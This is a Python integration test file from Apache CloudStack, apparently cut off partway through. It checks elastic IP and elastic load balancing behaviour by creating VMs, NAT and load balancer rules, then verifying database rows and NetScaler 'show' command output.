2015-01-13T15:28:37.000Z
|
2022-03-31T20:31:07.000Z
|
test/integration/component/test_eip_elb.py
|
Codegass/cloudstack
|
71056191f2bdad4be1a7eaf9bb73a7dcee3516f2
|
[
"Apache-2.0"
] | 1,083
|
2015-01-05T01:16:52.000Z
|
2022-03-31T12:14:10.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" P1 tests for elastic load balancing and elastic IP
"""
# Import Local Modules
from nose.plugins.attrib import attr
from marvin.cloudstackTestCase import cloudstackTestCase
import unittest
from marvin.cloudstackAPI import (authorizeSecurityGroupIngress,
disassociateIpAddress,
deleteLoadBalancerRule)
from marvin.lib.utils import cleanup_resources
from marvin.lib.base import (Account,
PublicIPAddress,
VirtualMachine,
Network,
LoadBalancerRule,
SecurityGroup,
ServiceOffering,
StaticNATRule,
PublicIpRange)
from marvin.lib.common import (get_zone,
get_domain,
get_template)
from marvin.sshClient import SshClient
import time
class Services:
"""Test elastic load balancing and elastic IP
"""
def __init__(self):
self.services = {
"account": {
"email": "test@test.com",
"firstname": "Test",
"lastname": "User",
"username": "test",
# Random characters are appended for unique
# username
"password": "password",
},
"service_offering": {
"name": "Tiny Instance",
"displaytext": "Tiny Instance",
"cpunumber": 1,
"cpuspeed": 100, # in MHz
"memory": 128, # In MBs
},
"lbrule": {
"name": "SSH",
"alg": "roundrobin",
# Algorithm used for load balancing
"privateport": 22,
"publicport": 22,
"openfirewall": False,
},
"natrule": {
"privateport": 22,
"publicport": 22,
"protocol": "TCP"
},
"virtual_machine": {
"displayname": "Test VM",
"username": "root",
"password": "password",
"ssh_port": 22,
"hypervisor": 'XenServer',
# Hypervisor type should be same as
# hypervisor type of cluster
"privateport": 22,
"publicport": 22,
"protocol": 'TCP',
},
"ostype": 'CentOS 5.3 (64-bit)',
# Cent OS 5.3 (64 bit)
"sleep": 60,
"timeout": 10,
}
class TestEIP(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(TestEIP, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.services = Services().services
try:
cls.services["netscaler"] = cls.config.__dict__[
"netscalerDevice"].__dict__
except KeyError:
raise unittest.SkipTest("Please make sure you have included netscalerDevice\
dict in your config file (keys - ipaddress, username,\
password")
except Exception as e:
raise unittest.SkipTest(e)
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.services['mode'] = cls.zone.networktype
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.services["ostype"]
)
cls.services["virtual_machine"]["zoneid"] = cls.zone.id
cls.services["virtual_machine"]["template"] = cls.template.id
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.services["service_offering"]
)
cls.account = Account.create(
cls.api_client,
cls.services["account"],
admin=True,
domainid=cls.domain.id
)
# Spawn an instance
cls.virtual_machine = VirtualMachine.create(
cls.api_client,
cls.services["virtual_machine"],
accountid=cls.account.name,
domainid=cls.account.domainid,
serviceofferingid=cls.service_offering.id
)
networks = Network.list(
cls.api_client,
zoneid=cls.zone.id,
listall=True
)
if isinstance(networks, list):
# Basic zone has only one network i.e Basic network
cls.guest_network = networks[0]
else:
raise Exception(
"List networks returned empty response for zone: %s" %
cls.zone.id)
ip_addrs = PublicIPAddress.list(
cls.api_client,
associatednetworkid=cls.guest_network.id,
isstaticnat=True,
account=cls.account.name,
domainid=cls.account.domainid,
listall=True
)
if isinstance(ip_addrs, list):
cls.source_nat = ip_addrs[0]
print("source_nat ipaddress : ", cls.source_nat.ipaddress)
else:
raise Exception(
"No Source NAT IP found for guest network: %s" %
cls.guest_network.id)
cls._cleanup = [
cls.account,
cls.service_offering,
]
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.cleanup = []
return
def tearDown(self):
try:
# Clean up, terminate the created network offerings
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["eip"])
def test_01_eip_by_deploying_instance(self):
"""Test EIP by deploying an instance
"""
# Validate the following
# 1. Instance gets an IP from GUEST IP range.
# 2. One IP from EIP pool is taken and configured on NS
# commands to verify on NS:
# show ip, show inat- make sure that output says USIP : ON
# 3. After allowing ingress rule based on source CIDR to the
# respective port, verify that you are able to reach guest with EIP
# 4. user_ip_address.is_system=1, user_ip_address.one_to_one_nat=1
self.debug("Fetching public network IP range for public network")
ip_ranges = PublicIpRange.list(
self.apiclient,
zoneid=self.zone.id,
forvirtualnetwork=True
)
self.assertEqual(
isinstance(ip_ranges, list),
True,
"Public IP range should return a valid range"
)
# Guest network can have multiple IP ranges. In that case, split IP
# address and then compare the values
for ip_range in ip_ranges:
self.debug("IP range: %s - %s" % (
ip_range.startip,
ip_range.endip
))
start_ip_list = ip_range.startip.split(".")
end_ip_list = ip_range.endip.split(".")
source_nat_list = self.source_nat.ipaddress.split(".")
self.assertGreaterEqual(
int(source_nat_list[3]),
int(start_ip_list[3]),
"The NAT should be greater/equal to start IP of guest network"
)
self.assertLessEqual(
int(source_nat_list[3]),
int(end_ip_list[3]),
"The NAT should be less/equal to start IP of guest network"
)
# Verify listSecurity groups response
security_groups = SecurityGroup.list(
self.apiclient,
account=self.account.name,
domainid=self.account.domainid
)
self.assertEqual(
isinstance(security_groups, list),
True,
"Check for list security groups response"
)
self.assertEqual(
len(security_groups),
1,
"Check List Security groups response"
)
self.debug("List Security groups response: %s" %
str(security_groups))
security_group = security_groups[0]
self.debug(
"Creating Ingress rule to allow SSH on default security group")
cmd = authorizeSecurityGroupIngress.authorizeSecurityGroupIngressCmd()
cmd.domainid = self.account.domainid
cmd.account = self.account.name
cmd.securitygroupid = security_group.id
cmd.protocol = 'TCP'
cmd.startport = 22
cmd.endport = 22
cmd.cidrlist = '0.0.0.0/0'
self.apiclient.authorizeSecurityGroupIngress(cmd)
# COMMENTED:
# try:
# self.debug("SSH into VM: %s" % self.virtual_machine.ssh_ip)
# ssh = self.virtual_machine.get_ssh_client(
# ipaddress=self.source_nat.ipaddress)
# except Exception as e:
# self.fail("SSH Access failed for %s: %s" % \
# (self.virtual_machine.ipaddress, e)
# )
# Fetch details from user_ip_address table in database
self.debug(
"select is_system, one_to_one_nat from user_ip_address\
where public_ip_address='%s';" %
self.source_nat.ipaddress)
qresultset = self.dbclient.execute(
"select is_system, one_to_one_nat from user_ip_address\
where public_ip_address='%s';" %
self.source_nat.ipaddress)
self.assertEqual(
isinstance(qresultset, list),
True,
"Check DB query result set for valid data"
)
self.assertNotEqual(
len(qresultset),
0,
"Check DB Query result set"
)
qresult = qresultset[0]
self.assertEqual(
qresult[0],
1,
"user_ip_address.is_system value should be 1 for static NAT"
)
self.assertEqual(
qresult[1],
1,
"user_ip_address.one_to_one_nat value should be 1 for static NAT"
)
self.debug("SSH into netscaler: %s" %
self.services["netscaler"]["ipaddress"])
ssh_client = SshClient(
self.services["netscaler"]["ipaddress"],
22,
self.services["netscaler"]["username"],
self.services["netscaler"]["password"],
)
self.debug("command: show ip")
res = ssh_client.execute("show ip")
result = str(res)
self.debug("Output: %s" % result)
self.assertEqual(
result.count(self.source_nat.ipaddress),
1,
"One IP from EIP pool should be taken and configured on NS"
)
self.debug("Command:show inat")
res = ssh_client.execute("show inat")
result = str(res)
self.debug("Output: %s" % result)
self.assertEqual(
result.count(
"NAME: Cloud-Inat-%s" %
self.source_nat.ipaddress),
1,
"User source IP should be enabled for INAT service")
return
@attr(tags=["eip"])
def test_02_acquire_ip_enable_static_nat(self):
"""Test associate new IP and enable static NAT for new IP and the VM
"""
# Validate the following
# 1. user_ip_address.is_system = 0 & user_ip_address.one_to_one_nat=1
# 2. releases default EIP whose user_ip_address.is_system=1
# 3. After allowing ingress rule based on source CIDR to the
# respective port, verify that you are able to reach guest with EIP
# 4. check configuration changes for EIP reflects on NS
# commands to verify on NS :
# * "show ip"
# * "show inat" - make sure that output says USIP : ON
self.debug("Acquiring new IP for network: %s" % self.guest_network.id)
public_ip = PublicIPAddress.create(
self.apiclient,
accountid=self.account.name,
zoneid=self.zone.id,
domainid=self.account.domainid,
services=self.services["virtual_machine"]
)
self.debug("IP address: %s is acquired by network: %s" % (
public_ip.ipaddress.ipaddress,
self.guest_network.id))
self.debug("Enabling static NAT for IP Address: %s" %
public_ip.ipaddress.ipaddress)
StaticNATRule.enable(
self.apiclient,
ipaddressid=public_ip.ipaddress.id,
virtualmachineid=self.virtual_machine.id
)
# Fetch details from user_ip_address table in database
self.debug(
"select is_system, one_to_one_nat from user_ip_address\
where public_ip_address='%s';" %
public_ip.ipaddress.ipaddress)
qresultset = self.dbclient.execute(
"select is_system, one_to_one_nat from user_ip_address\
where public_ip_address='%s';" %
public_ip.ipaddress.ipaddress)
self.assertEqual(
isinstance(qresultset, list),
True,
"Check DB query result set for valid data"
)
self.assertNotEqual(
len(qresultset),
0,
"Check DB Query result set"
)
qresult = qresultset[0]
self.assertEqual(
qresult[0],
0,
"user_ip_address.is_system value should be 0 for new IP"
)
self.assertEqual(
qresult[1],
1,
"user_ip_address.one_to_one_nat value should be 1 for static NAT"
)
self.debug(
"select is_system, one_to_one_nat from user_ip_address\
where public_ip_address='%s';" %
self.source_nat.ipaddress)
qresultset = self.dbclient.execute(
"select is_system, one_to_one_nat from user_ip_address\
where public_ip_address='%s';" %
self.source_nat.ipaddress)
self.assertEqual(
isinstance(qresultset, list),
True,
"Check DB query result set for valid data"
)
self.assertNotEqual(
len(qresultset),
0,
"Check DB Query result set"
)
qresult = qresultset[0]
self.assertEqual(
qresult[0],
0,
"user_ip_address.is_system value should be 0 old source NAT"
)
# try:
# self.debug("SSH into VM: %s" % public_ip.ipaddress)
# ssh = self.virtual_machine.get_ssh_client(
# ipaddress=public_ip.ipaddress)
# except Exception as e:
# self.fail("SSH Access failed for %s: %s" % \
# (public_ip.ipaddress, e)
# )
self.debug("SSH into netscaler: %s" %
self.services["netscaler"]["ipaddress"])
try:
ssh_client = SshClient(
self.services["netscaler"]["ipaddress"],
22,
self.services["netscaler"]["username"],
self.services["netscaler"]["password"],
)
self.debug("command: show ip")
res = ssh_client.execute("show ip")
result = str(res)
self.debug("Output: %s" % result)
self.assertEqual(
result.count(public_ip.ipaddress.ipaddress),
1,
"One IP from EIP pool should be taken and configured on NS"
)
self.debug("Command:show inat")
res = ssh_client.execute("show inat")
result = str(res)
self.debug("Output: %s" % result)
self.assertEqual(
result.count(
"NAME: Cloud-Inat-%s" %
public_ip.ipaddress.ipaddress),
1,
"User source IP should be enabled for INAT service")
except Exception as e:
self.fail("SSH Access failed for %s: %s" %
(self.services["netscaler"]["ipaddress"], e))
return
@attr(tags=["eip"])
def test_03_disable_static_nat(self):
"""Test disable static NAT and release EIP acquired
"""
# Validate the following
# 1. Disable static NAT. Disables one-to-one NAT and releases EIP
# whose user_ip_address.is_system=0
# 2. Gets a new ip from EIP pool whose user_ip_address.is_system=1
# and user_ip_address.one_to_one_nat=1
# 3. DisassicateIP should mark this EIP whose is_system=0 as free.
# commands to verify on NS :
# * "show ip"
# * "show inat"-make sure that output says USIP : ON
self.debug(
"Fetching static NAT for VM: %s" % self.virtual_machine.name)
ip_addrs = PublicIPAddress.list(
self.api_client,
associatednetworkid=self.guest_network.id,
isstaticnat=True,
account=self.account.name,
domainid=self.account.domainid,
listall=True
)
self.assertEqual(
isinstance(ip_addrs, list),
True,
"List Public IP address should return valid IP address for network"
)
static_nat = ip_addrs[0]
self.debug("Static NAT for VM: %s is: %s" % (
self.virtual_machine.name,
static_nat.ipaddress
))
# Fetch details from user_ip_address table in database
self.debug(
"select is_system from user_ip_address where\
public_ip_address='%s';" %
static_nat.ipaddress)
qresultset = self.dbclient.execute(
"select is_system from user_ip_address where\
public_ip_address='%s';" %
static_nat.ipaddress)
self.assertEqual(
isinstance(qresultset, list),
True,
"Check DB query result set for valid data"
)
self.assertNotEqual(
len(qresultset),
0,
"Check DB Query result set"
)
qresult = qresultset[0]
self.assertEqual(
qresult[0],
0,
"user_ip_address.is_system value should be 0"
)
self.debug(
"Disassociate Static NAT: %s" %
static_nat.ipaddress)
cmd = disassociateIpAddress.disassociateIpAddressCmd()
cmd.id = static_nat.id
self.apiclient.disassociateIpAddress(cmd)
self.debug("Sleeping - after disassociating static NAT")
time.sleep(self.services["sleep"])
# Fetch details from user_ip_address table in database
self.debug(
"select state from user_ip_address where public_ip_address='%s';"
% static_nat.ipaddress)
qresultset = self.dbclient.execute(
"select state from user_ip_address where public_ip_address='%s';"
% static_nat.ipaddress
)
self.assertEqual(
isinstance(qresultset, list),
True,
"Check DB query result set for valid data"
)
self.assertNotEqual(
len(qresultset),
0,
"Check DB Query result set"
)
qresult = qresultset[0]
self.assertEqual(
qresult[0],
"Free",
"Ip should be marked as Free after disassociate IP"
)
self.debug(
"Fetching static NAT for VM: %s" % self.virtual_machine.name)
ip_addrs = PublicIPAddress.list(
self.api_client,
associatednetworkid=self.guest_network.id,
isstaticnat=True,
account=self.account.name,
domainid=self.account.domainid,
listall=True
)
self.assertEqual(
isinstance(ip_addrs, list),
True,
"List Public IP address should return valid IP address for network"
)
static_nat = ip_addrs[0]
self.debug("Static NAT for VM: %s is: %s" % (
self.virtual_machine.name,
static_nat.ipaddress
))
# Fetch details from user_ip_address table in database
self.debug(
"select is_system, one_to_one_nat from user_ip_address\
where public_ip_address='%s';" %
static_nat.ipaddress)
qresultset = self.dbclient.execute(
"select is_system, one_to_one_nat from user_ip_address\
where public_ip_address='%s';" %
static_nat.ipaddress)
self.assertEqual(
isinstance(qresultset, list),
True,
"Check DB query result set for valid data"
)
self.assertNotEqual(
len(qresultset),
0,
"Check DB Query result set"
)
qresult = qresultset[0]
self.assertEqual(
qresult[0],
1,
"is_system value should be 1 for automatically assigned IP"
)
self.assertEqual(
qresult[1],
1,
"one_to_one_nat value should be 1 for automatically assigned IP"
)
# try:
# self.debug("SSH into VM: %s" % static_nat.ipaddress)
# ssh = self.virtual_machine.get_ssh_client(
# ipaddress=static_nat.ipaddress)
# except Exception as e:
# self.fail("SSH Access failed for %s: %s" % \
# (static_nat.ipaddress, e))
self.debug("SSH into netscaler: %s" %
self.services["netscaler"]["ipaddress"])
ssh_client = SshClient(
self.services["netscaler"]["ipaddress"],
22,
self.services["netscaler"]["username"],
self.services["netscaler"]["password"],
)
self.debug("command: show ip")
res = ssh_client.execute("show ip")
result = str(res)
self.debug("Output: %s" % result)
self.assertEqual(
result.count(static_nat.ipaddress),
1,
"One IP from EIP pool should be taken and configured on NS"
)
self.debug("Command:show inat")
res = ssh_client.execute("show inat")
result = str(res)
self.debug("Output: %s" % result)
self.assertEqual(
result.count("USIP: ON"),
2,
"User source IP should be enabled for INAT service"
)
return
@attr(tags=["eip"])
def test_04_disable_static_nat_system(self):
"""Test disable static NAT with system = True
"""
# Validate the following
# 1. Try to disassociate/disable static NAT on EIP where is_system=1
# 2. This operation should fail with proper error message.
self.debug(
"Fetching static NAT for VM: %s" % self.virtual_machine.name)
ip_addrs = PublicIPAddress.list(
self.api_client,
associatednetworkid=self.guest_network.id,
isstaticnat=True,
account=self.account.name,
domainid=self.account.domainid,
listall=True
)
self.assertEqual(
isinstance(ip_addrs, list),
True,
"List Public IP address should return valid IP address for network"
)
static_nat = ip_addrs[0]
self.debug("Static NAT for VM: %s is: %s" % (
self.virtual_machine.name,
static_nat.ipaddress
))
# Fetch details from user_ip_address table in database
self.debug(
"select is_system from user_ip_address where\
public_ip_address='%s';" %
static_nat.ipaddress)
qresultset = self.dbclient.execute(
"select is_system from user_ip_address where\
public_ip_address='%s';" %
static_nat.ipaddress)
self.assertEqual(
isinstance(qresultset, list),
True,
"Check DB query result set for valid data"
)
self.assertNotEqual(
len(qresultset),
0,
"Check DB Query result set"
)
qresult = qresultset[0]
self.assertEqual(
qresult[0],
1,
"user_ip_address.is_system value should be 1"
)
self.debug(
"Disassociate Static NAT: %s" %
static_nat.ipaddress)
with self.assertRaises(Exception):
cmd = disassociateIpAddress.disassociateIpAddressCmd()
cmd.id = static_nat.id
self.api_client.disassociateIpAddress(cmd)
self.debug("Disassociate system IP failed")
return
@attr(tags=["eip"])
def test_05_destroy_instance(self):
"""Test EIO after destroying instance
"""
# Validate the following
# 1. Destroy instance. Destroy should result in is_system=0 for EIP
# and EIP should also be marked as free.
# 2. Commands to verify on NS :
# * "show ip"
# * "show inat" - make sure that output says USIP: ON
self.debug(
"Fetching static NAT for VM: %s" % self.virtual_machine.name)
ip_addrs = PublicIPAddress.list(
self.api_client,
associatednetworkid=self.guest_network.id,
isstaticnat=True,
account=self.account.name,
domainid=self.account.domainid,
listall=True
)
self.assertEqual(
isinstance(ip_addrs, list),
True,
"List Public IP address should return valid IP address for network"
)
static_nat = ip_addrs[0]
self.debug("Static NAT for VM: %s is: %s" % (
self.virtual_machine.name,
static_nat.ipaddress
))
self.debug("Destroying an instance: %s" % self.virtual_machine.name)
self.virtual_machine.delete(self.apiclient, expunge=True)
self.debug("Destroy instance complete!")
vms = VirtualMachine.list(
self.apiclient,
id=self.virtual_machine.id
)
self.assertEqual(
vms,
None,
"list VM should not return anything after destroy"
)
# Fetch details from user_ip_address table in database
self.debug(
"select is_system, state from user_ip_address where\
public_ip_address='%s';" %
static_nat.ipaddress)
qresultset = self.dbclient.execute(
"select is_system, state from user_ip_address where\
public_ip_address='%s';" %
static_nat.ipaddress)
self.assertEqual(
isinstance(qresultset, list),
True,
"Check DB query result set for valid data"
)
self.assertNotEqual(
len(qresultset),
0,
"Check DB Query result set"
)
qresult = qresultset[0]
self.assertEqual(
qresult[0],
0,
"user_ip_address.is_system value should be 0"
)
self.assertEqual(
qresult[1],
"Free",
"IP should be marked as Free after destroying VM"
)
self.debug("SSH into netscaler: %s" %
self.services["netscaler"]["ipaddress"])
ssh_client = SshClient(
self.services["netscaler"]["ipaddress"],
22,
self.services["netscaler"]["username"],
self.services["netscaler"]["password"],
)
self.debug("command: show ip")
res = ssh_client.execute("show ip")
result = str(res)
self.debug("Output: %s" % result)
self.assertEqual(
result.count(static_nat.ipaddress),
0,
"show ip should return nothing after VM destroy"
)
self.debug("Command:show inat")
res = ssh_client.execute("show inat")
result = str(res)
self.debug("Output: %s" % result)
self.assertEqual(
result.count(static_nat.ipaddress),
0,
"show inat should return nothing after VM destroy"
)
return
class TestELB(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(TestELB, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.services = Services().services
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.services['mode'] = cls.zone.networktype
try:
cls.services["netscaler"] = cls.config.__dict__[
"netscalerDevice"].__dict__
except KeyError:
raise unittest.SkipTest("Please make sure you have included netscalerDevice\
dict in your config file (keys - ipaddress, username,\
password")
except Exception as e:
raise unittest.SkipTest(e)
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.services["ostype"]
)
cls.services["virtual_machine"]["zoneid"] = cls.zone.id
cls.services["virtual_machine"]["template"] = cls.template.id
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.services["service_offering"]
)
cls.account = Account.create(
cls.api_client,
cls.services["account"],
admin=True,
domainid=cls.domain.id
)
# Spawn an instance
cls.vm_1 = VirtualMachine.create(
cls.api_client,
cls.services["virtual_machine"],
accountid=cls.account.name,
domainid=cls.account.domainid,
serviceofferingid=cls.service_offering.id
)
cls.vm_2 = VirtualMachine.create(
cls.api_client,
cls.services["virtual_machine"],
accountid=cls.account.name,
domainid=cls.account.domainid,
serviceofferingid=cls.service_offering.id
)
networks = Network.list(
cls.api_client,
zoneid=cls.zone.id,
listall=True
)
if isinstance(networks, list):
# Basic zone has only one network i.e Basic network
cls.guest_network = networks[0]
else:
raise Exception(
"List networks returned empty response for zone: %s" %
cls.zone.id)
cls.lb_rule = LoadBalancerRule.create(
cls.api_client,
cls.services["lbrule"],
accountid=cls.account.name,
networkid=cls.guest_network.id,
domainid=cls.account.domainid
)
cls.lb_rule.assign(cls.api_client, [cls.vm_1, cls.vm_2])
cls._cleanup = [
cls.account,
cls.service_offering,
]
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.cleanup = []
return
def tearDown(self):
try:
# Clean up, terminate the created network offerings
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["eip"])
def test_01_elb_create(self):
"""Test ELB by creating a LB rule
"""
# Validate the following
# 1. Deploy 2 instances
# 2. Create LB rule to port 22 for the VMs and try to access VMs with
# EIP:port. Make sure that ingress rule is created to allow access
# with universal CIDR (0.0.0.0/0)
# 3. For LB rule IP user_ip_address.is_system=1
# 4. check configuration changes for EIP reflects on NS
# commands to verify on NS :
# * "show ip"
# * "show lb vserer"-make sure that output says they are all up
# and running and USNIP : ON
# Verify listSecurity groups response
security_groups = SecurityGroup.list(
self.apiclient,
account=self.account.name,
domainid=self.account.domainid
)
self.assertEqual(
isinstance(security_groups, list),
True,
"Check for list security groups response"
)
self.assertEqual(
len(security_groups),
1,
"Check List Security groups response"
)
self.debug("List Security groups response: %s" %
str(security_groups))
security_group = security_groups[0]
self.debug(
"Creating Ingress rule to allow SSH on default security group")
cmd = authorizeSecurityGroupIngress.authorizeSecurityGroupIngressCmd()
cmd.domainid = self.account.domainid
cmd.account = self.account.name
cmd.securitygroupid = security_group.id
cmd.protocol = 'TCP'
cmd.startport = 22
cmd.endport = 22
cmd.cidrlist = '0.0.0.0/0'
self.apiclient.authorizeSecurityGroupIngress(cmd)
self.debug(
"Fetching LB IP for account: %s" % self.account.name)
ip_addrs = PublicIPAddress.list(
self.api_client,
associatednetworkid=self.guest_network.id,
account=self.account.name,
domainid=self.account.domainid,
forloadbalancing=True,
listall=True
)
self.assertEqual(
isinstance(ip_addrs, list),
True,
"List Public IP address should return valid IP address for network"
)
lb_ip = ip_addrs[0]
self.debug("LB IP generated for account: %s is: %s" % (
self.account.name,
lb_ip.ipaddress
))
# TODO: uncomment this after ssh issue is resolved
# self.debug("SSHing into VMs using ELB IP: %s" % lb_ip.ipaddress)
# try:
# ssh_1 = self.vm_1.get_ssh_client(ipaddress=lb_ip.ipaddress)
# self.debug("Command: hostname")
# result = ssh_1.execute("hostname")
# self.debug("Result: %s" % result)
#
# if isinstance(result, list):
# res = result[0]
# else:
# self.fail("hostname retrieval failed!")
#
# self.assertIn(
# res,
# [self.vm_1.name, self.vm_2.name],
# "SSH should return hostname of one of the VM"
# )
#
# ssh_2 = self.vm_2.get_ssh_client(ipaddress=lb_ip.ipaddress)
# self.debug("Command: hostname")
# result = ssh_2.execute("hostname")
# self.debug("Result: %s" % result)
#
# if isinstance(result, list):
# res = result[0]
# else:
# self.fail("hostname retrieval failed!")
# self.assertIn(
# res,
# [self.vm_1.name, self.vm_2.name],
# "SSH should return hostname of one of the VM"
# )
# except Exception as e:
# self.fail(
# "SSH Access failed for %s: %s" % (self.vm_1.ipaddress, e))
# Fetch details from user_ip_address table in database
self.debug(
"select is_system from user_ip_address where\
public_ip_address='%s';" %
lb_ip.ipaddress)
qresultset = self.dbclient.execute(
"select is_system from user_ip_address where\
public_ip_address='%s';" %
lb_ip.ipaddress)
self.assertEqual(
isinstance(qresultset, list),
True,
"Check DB query result set for valid data"
)
self.assertNotEqual(
len(qresultset),
0,
"Check DB Query result set"
)
qresult = qresultset[0]
self.assertEqual(
qresult[0],
1,
"is_system value should be 1 for system generated LB rule"
)
self.debug("SSH into netscaler: %s" %
self.services["netscaler"]["ipaddress"])
try:
ssh_client = SshClient(
self.services["netscaler"]["ipaddress"],
22,
self.services["netscaler"]["username"],
self.services["netscaler"]["password"],
)
self.debug("command: show ip")
res = ssh_client.execute("show ip")
result = str(res)
self.debug("Output: %s" % result)
self.assertEqual(
result.count(lb_ip.ipaddress),
1,
"One IP from EIP pool should be taken and configured on NS"
)
self.debug("Command:show lb vserver")
res = ssh_client.execute("show lb vserver")
result = str(res)
self.debug("Output: %s" % result)
self.assertEqual(
result.count(
"Cloud-VirtualServer-%s-22 (%s:22) - TCP" %
(lb_ip.ipaddress,
lb_ip.ipaddress)),
1,
"User subnet IP should be enabled for LB service")
except Exception as e:
self.fail("SSH Access failed for %s: %s" %
(self.services["netscaler"]["ipaddress"], e))
return
@attr(tags=["eip"])
def test_02_elb_acquire_and_create(self):
"""Test ELB by acquiring IP and then creating a LB rule
"""
# Validate the following
# 1. Deploy 2 instances
# 2. Create LB rule to port 22 for the VMs and try to access VMs with
# EIP:port. Make sure that ingress rule is created to allow access
# with universal CIDR (0.0.0.0/0)
# 3. For LB rule IP user_ip_address.is_system=0
# 4. check configuration changes for EIP reflects on NS
# commands to verify on NS :
# * "show ip"
# * "show lb vserer" - make sure that output says they are all up
# and running and USNIP : ON
self.debug("Acquiring new IP for network: %s" % self.guest_network.id)
public_ip = PublicIPAddress.create(
self.apiclient,
accountid=self.account.name,
zoneid=self.zone.id,
domainid=self.account.domainid,
services=self.services["virtual_machine"]
)
self.debug("IP address: %s is acquired by network: %s" % (
public_ip.ipaddress.ipaddress,
self.guest_network.id))
self.debug("Creating LB rule for public IP: %s" %
public_ip.ipaddress.ipaddress)
lb_rule = LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
accountid=self.account.name,
ipaddressid=public_ip.ipaddress.id,
networkid=self.guest_network.id,
domainid=self.account.domainid
)
self.debug("Assigning VMs (%s, %s) to LB rule: %s" % (self.vm_1.name,
self.vm_2.name,
lb_rule.name))
lb_rule.assign(self.apiclient, [self.vm_1, self.vm_2])
# TODO: workaround : add route in the guest VM for SNIP
#
# self.debug("SSHing into VMs using ELB IP: %s" %
# public_ip.ipaddress)
# try:
# ssh_1 = self.vm_1.get_ssh_client(
# ipaddress=public_ip.ipaddress)
# self.debug("Command: hostname")
# result = ssh_1.execute("hostname")
# self.debug("Result: %s" % result)
#
# if isinstance(result, list):
# res = result[0]
# else:
# self.fail("hostname retrieval failed!")
# self.assertIn(
# res,
# [self.vm_1.name, self.vm_2.name],
# "SSH should return hostname of one of the VM"
# )
#
# ssh_2 = self.vm_2.get_ssh_client(
# ipaddress=public_ip.ipaddress)
# self.debug("Command: hostname")
# result = ssh_2.execute("hostname")
# self.debug("Result: %s" % result)
#
# if isinstance(result, list):
# res = result[0]
# else:
# self.fail("hostname retrieval failed!")
# self.assertIn(
# res,
# [self.vm_1.name, self.vm_2.name],
# "SSH should return hostname of one of the VM"
# )
# except Exception as e:
# self.fail(
# "SSH Access failed for %s: %s" % (self.vm_1.ipaddress, e))
#
# Fetch details from user_ip_address table in database
self.debug(
"select is_system from user_ip_address where\
public_ip_address='%s';" %
public_ip.ipaddress.ipaddress)
qresultset = self.dbclient.execute(
"select is_system from user_ip_address where\
public_ip_address='%s';" %
public_ip.ipaddress.ipaddress)
self.assertEqual(
isinstance(qresultset, list),
True,
"Check DB query result set for valid data"
)
self.assertNotEqual(
len(qresultset),
0,
"Check DB Query result set"
)
qresult = qresultset[0]
self.assertEqual(
qresult[0],
0,
"is_system value should be 0 for non-system generated LB rule"
)
self.debug("SSH into netscaler: %s" %
self.services["netscaler"]["ipaddress"])
try:
ssh_client = SshClient(
self.services["netscaler"]["ipaddress"],
22,
self.services["netscaler"]["username"],
self.services["netscaler"]["password"],
)
self.debug("command: show ip")
res = ssh_client.execute("show ip")
result = str(res)
self.debug("Output: %s" % result)
self.assertEqual(
result.count(public_ip.ipaddress.ipaddress),
1,
"One IP from EIP pool should be taken and configured on NS"
)
self.debug("Command:show lb vserver")
res = ssh_client.execute("show lb vserver")
result = str(res)
self.debug("Output: %s" % result)
self.assertEqual(
result.count(
"Cloud-VirtualServer-%s-22 (%s:22) - TCP" %
(public_ip.ipaddress.ipaddress,
public_ip.ipaddress.ipaddress)),
1,
"User subnet IP should be enabled for LB service")
except Exception as e:
self.fail("SSH Access failed for %s: %s" %
(self.services["netscaler"]["ipaddress"], e))
return
@attr(tags=["eip"])
def test_03_elb_delete_lb_system(self):
"""Test delete LB rule generated with public IP with is_system = 1
"""
# Validate the following
# 1. Deleting LB rule should release EIP where is_system=1
# 2. check configuration changes for EIP reflects on NS
# commands to verify on NS:
# * "show ip"
# * "show lb vserer"-make sure that output says they are all up and
# running and USNIP : ON
self.debug(
"Fetching LB IP for account: %s" % self.account.name)
ip_addrs = PublicIPAddress.list(
self.api_client,
associatednetworkid=self.guest_network.id,
account=self.account.name,
domainid=self.account.domainid,
forloadbalancing=True,
listall=True
)
self.assertEqual(
isinstance(ip_addrs, list),
True,
"List Public IP address should return valid IP address for network"
)
lb_ip = ip_addrs[0]
self.debug("LB IP generated for account: %s is: %s" % (
self.account.name,
lb_ip.ipaddress
))
self.debug("Deleting LB rule: %s" % self.lb_rule.id)
